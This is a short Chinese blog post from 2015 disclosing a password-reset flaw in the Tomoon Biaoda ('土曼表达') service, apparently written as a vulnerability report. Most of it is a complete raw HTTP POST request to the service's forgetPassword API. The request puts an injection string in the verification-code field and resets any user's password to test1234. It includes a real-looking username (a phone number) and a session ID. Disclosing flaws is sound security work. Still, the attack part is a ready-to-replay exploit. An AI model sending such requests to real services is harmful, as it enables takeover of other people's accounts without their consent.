土曼表达存在可重置任意用户密码的漏洞

土曼表达存在可重置任意用户密码的漏洞

张贴在 2015年12月27日来自 Glzjin in 存根

这里找回密码的接口对于验证码没有过滤那么

            POST http://biaoda.tomoon.cn/DigitalFrame HTTP/1.1
            APIVersion: 1.0
            Action: forgetPassword
            Device-Type: MP
            UUID: 868048029706082
            Charset: UTF-8
            Content-Type: application/json
            UserID: 
            SessionID: 191fa4b4-4971-405b-942a-90a076fc78bf
            Content-Length: 100
            Host: biaoda.tomoon.cn
            Connection: Keep-Alive

            {"userName":"18518605216","userCode":"1=1 OR 1=1 ","userPassNew":"16D7A4FCA7442DDA3AD93C9A726597E4"}

这样即可重置任意账户的密码，重置为 test1234.

甚至 11111111111 账号也可用这个方法重置。

演示

发表回复取消回复

此站点使用Akismet来减少垃圾评论。了解我们如何处理您的评论数据。

发表回复 取消回复

发表回复取消回复